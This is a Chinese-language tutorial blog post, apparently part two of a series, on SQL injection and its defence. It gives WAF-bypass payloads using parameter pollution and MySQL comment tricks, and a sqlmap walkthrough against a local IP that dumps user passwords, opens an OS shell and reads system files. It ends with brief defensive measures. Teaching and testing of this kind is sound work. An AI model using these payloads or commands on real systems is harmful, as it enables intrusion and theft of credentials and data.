网络安全之SQL注入及防御（下篇）

目录

什么是SQL注入？

一，SQL注入会导致什么呢？

二，SQL注入思想与步骤

三，SQL注入的绕过

四，sqlmap工具的使用

五，sql注入的防御方法

总结

---

什么是SQL注入？

SQL注入（SQL Injection）是一种常见的网络攻击手段，是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码，在应用程序未授权的情况下执行任意的SQL语句。

一，SQL注入会导致什么呢？

1，数据泄露：我们的账号密码，个人身份信息的等等

2，数据篡改：篡改商品的价格，学生成绩等等

3，数据删除：删除某些数据

4，拒绝服务攻击（DoS）：利用SQL注入制作大量查询和复杂的操作导致系统资源耗尽

5，提权攻击：利用SQL注入提升权限执行系统命令等

6，绕过身份验证：利用SQL注入绕过身份验证使得攻击者管理员特权身份

二，SQL注入思想与步骤

1，找到注入点

2，获取对方数据库名字

3，获取对方数据库中有那些表

4，获取表中有哪些字段

5，获取字段表中的数据

三，SQL注入的绕过

开启waf

注入sql代码：

union select 1,2,3,select database()

可以看到被防火墙拦截了

那么怎么办呢？

这种情况下get的提交方式不行，就用post加特殊字符过滤绕过检测

sql注入代码：

?id=1/**&id=-1%20union%20select%201,2,3,database/**/()%23*/

/**/在数据库中是注释符号，%20是空格，%23是#

|------------------|-----------------------------|--------|
| web服务器 | 参数获取函数 | 获取到的参数 |
| PHP/Apache | $_GET("par") | 最后一个 |
| JSP/Tomcat | Request.getParameter("par") | 第一个 |
| Perl(CGI)/Apache | Param("par") | 第一个 |
| Python/Apache | Getvalue("par") | 所有的 |
| ASP/IIS | Request.QueryString("par") | 所有的 |

利用数据库的特性

sql注入代码：

?id=-1%20union%20/*!44509select*/%201,2,3,4

四，sqlmap工具的使用

sqlmap 是一个开源的渗透测试工具，它能自动检测和利用SQL注入漏洞并接管数据库，现在非常强了，都能自动绕过waf了。

这是一个kali linux自带的工具

1，检测网站是否存在sql注入漏洞

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2'

2，查看当前数据库

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --current-db

3，查看数据库中有那些表

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt --tables

4，查看表中有那些字段

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt -T users --columns

5， 列出其中的数据

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' -D jrlt -T users -C name,password --dump

6，执行sql语句

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --sql-shell

7， 爆破数据库弱密码

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --password

8，执行系统命令

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --os-shell

9，读取系统文件

sqlmap -u 'http://192.168.0.107/bbs/showmessage.php?id=2' --file-read "D:\1.txt"

五，sql注入的防御方法

1，过滤

【1】限制参数的长度

【2】过滤掉恶意代码（例如：select,union,order by,update）

2，转义

把用户输入的数据当成文本

3，数据库安全控制

【1】设置权限

【2】数据加密

4，进行预编译

总结

时代在发展，科技在进步，在当下一日千里的时代我们今天学的东西明天可能就过时了，有时候绕过waf时非常轻松，但是过了一段时间发现同样的方法已经绕不过了，那咋办呢？凉拌？那当然是保持学习，与时俱进，网络安全不就是道高一尺魔高一丈嘛，网络安全技术在升级，我们也应当保持积极学习的心态，去挖掘其中的奥义，积极吸取他人的经验。